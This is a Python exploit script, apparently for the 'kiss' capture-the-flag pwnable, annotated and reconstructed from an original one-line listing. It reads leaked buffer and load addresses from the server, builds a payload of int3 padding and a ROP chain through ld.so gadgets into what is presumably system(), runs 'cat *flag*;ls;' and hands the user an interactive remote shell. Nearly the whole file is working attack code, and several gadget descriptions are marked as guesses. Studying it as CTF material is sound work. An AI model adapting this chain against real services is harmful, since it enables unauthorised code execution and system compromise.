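"""Remote exploit for the "kiss" pwnable (host in HOST below).

Protocol as driven by this script (reconstructed from the original one-line
listing, which had lost its line breaks):

  1. the server prints a banner line, then a line ending in the address of
     our input buffer, then a line ending in the binary's load address;
  2. we answer with the payload length (0xa00) and then 0xa00 raw bytes;
  3. the server prompts with '?', we send an address inside our buffer and,
     presumably, control is transferred there - an interactive shell follows.

Every offset in this file (library deltas, ld.so/libc gadgets, the 0x1a0/
0x1a8/0x800 buffer offsets) is specific to the remote process' memory layout
and library builds. None of them can be re-derived from this script; they
must be recomputed for any other target. Dead commented-out experiments from
the original (vsyscall gadget, set_rsp/set_rsi stubs) were dropped.
"""
import select
import struct
import sys

HOST = 'kiss_88581d4e20dc97355f1d86b6905f6103.quals.shallweplayaga.me'
PORT = 3155
# Alternate target kept from the original (it was commented out there too):
# HOST, PORT = 'makbox.i.dragonsector.pl', 1234

# Distance from the leaked binary base down to the libc and ld.so mappings.
# These depend on the exact mmap layout of the remote process - TODO confirm
# against a fresh leak before reusing on another host or libc build.
LIBC_DELTA = 0x5ea000
LD_DELTA = 0x225000

# Total byte count announced to the server, split into two regions.
PAYLOAD_LEN = 0xa00
REGION1_LEN = 0x900
REGION2_LEN = PAYLOAD_LEN - REGION1_LEN

# Shell command run on the target once control is hijacked (NUL-terminated;
# the trailing pair of NULs keeps the string 8-byte aligned in the chain).
COMMAND = b"cat *flag*;ls;\x00\x00"


def p64(value):
    """Pack *value* as an unsigned little-endian 64-bit integer.

    Stdlib stand-in for ``phun.p64`` so the payload builder can be exercised
    without the CTF helper library. Raises ``struct.error`` for values outside
    0 .. 2**64-1.
    """
    return struct.pack("<Q", value)


def parse_leak(line):
    """Return the hex address that ends a leak line such as ``"buf: 0x7ffc..."``.

    The last space-separated token is parsed base 16. A ``ValueError`` is
    deliberately allowed to propagate: if the server's output format is not
    what we expect, failing here beats sending a payload built from garbage.
    """
    return int(line.strip().split(" ")[-1], 16)


def build_payload(hit_addr, libc, libld):
    """Build the PAYLOAD_LEN-byte blob written into the server's buffer.

    Args:
        hit_addr: address inside our buffer that is later handed back to the
            server (see ``main``); chain pointers are expressed relative to it.
        libc: libc load base on the target.
        libld: ld.so load base on the target.

    Returns:
        ``bytes`` of length exactly PAYLOAD_LEN.

    Region 1 (0x900 bytes) is a repeated 16-byte pair: a pointer to
    ``hit_addr + 0x1a0`` followed by eight 0xcc bytes (int3) - presumably so
    that wherever the server lands in that region it sees the same pointer.
    Region 2 (0x100 bytes) is a ROP-style chain repeated as often as it fits
    and padded with 'B'. The gadget semantics at the ld.so offsets below are
    not recoverable from this script - TODO document them (the 4x-repeated
    one looks like a ret sled); ``libc + 0x46640`` is presumably ``system``
    since the command string immediately follows it in the chain.
    """
    region1 = (p64(hit_addr + 0x1a0) + b"\xcc" * 8) * (REGION1_LEN // 16)

    chain = b"".join([
        p64(hit_addr + 0x1a8),
        p64(hit_addr + 0x1a8 + 8),
        p64(libld + 0x0001698b),        # ld.so gadget - TODO confirm
        p64(libld + 0x0001a462) * 4,    # ld.so gadget, repeated 4x
        p64(hit_addr + 0x1a8 + 10 * 8),
        p64(libld + 0xd9a),             # ld.so gadget - TODO confirm
        p64(0),
        p64(libc + 0x46640),            # presumably system() - TODO confirm
        COMMAND,
        b"B" * 8,
    ])
    if len(chain) > REGION2_LEN:
        raise ValueError("chain (%d bytes) exceeds region 2 (%d bytes)"
                         % (len(chain), REGION2_LEN))
    # Integer division: the original used '/', which is a float under Python 3.
    region2 = chain * (REGION2_LEN // len(chain))
    region2 = region2.ljust(REGION2_LEN, b"B")

    return region1 + region2


def interact(sock):
    """Relay stdin to *sock* and remote output to stdout until either side closes.

    Replaces the ``telnetlib.Telnet().interact()`` hack of the original:
    ``telnetlib`` is deprecated since Python 3.11 and removed in 3.13, and it
    also interprets telnet IAC (0xff) bytes, which is unwanted on a raw shell.
    Remote output is written verbatim - a hostile peer can emit terminal
    escape sequences, so run this in a throwaway terminal.
    """
    stdin = getattr(sys.stdin, "buffer", sys.stdin)      # binary stream on 3.x
    stdout = getattr(sys.stdout, "buffer", sys.stdout)
    while True:
        readable, _, _ = select.select([sock, sys.stdin], [], [])
        if sock in readable:
            data = sock.recv(4096)
            if not data:
                return
            stdout.write(data)
            stdout.flush()
        if sys.stdin in readable:
            line = stdin.readline()
            if not line:
                return
            sock.sendall(line)


def main(host=HOST, port=PORT):
    """Connect to the target, leak addresses, deliver the payload, drop to a shell."""
    import phun  # deferred so the payload builder stays importable without it

    p = phun.Remote(host, port)
    p.read("\n")                              # banner line, discarded
    buf_addr = parse_leak(p.read("\n"))       # address of our input buffer
    binary = parse_leak(p.read("\n"))         # binary load base
    libc = binary - LIBC_DELTA
    libld = binary - LD_DELTA
    # Address handed back to the server in step 3: 0x800 into our buffer,
    # i.e. inside region 1 - presumably where execution resumes. TODO confirm.
    hit_addr = buf_addr + 0x800

    # In the collapsed original the comment boundary around this call is
    # ambiguous; 0xa00 equals the payload length, so it is treated as live.
    p.sendline("0xa00")
    p.read('\n')

    p.write(build_payload(hit_addr, libc, libld))
    p.read("?")
    # "0x%x" rather than hex(): avoids the 'L' suffix Python 2 appends to longs.
    p.sendline("0x%x" % hit_addr)
    p.read("\n")
    interact(p.sock)


if __name__ == "__main__":
    main()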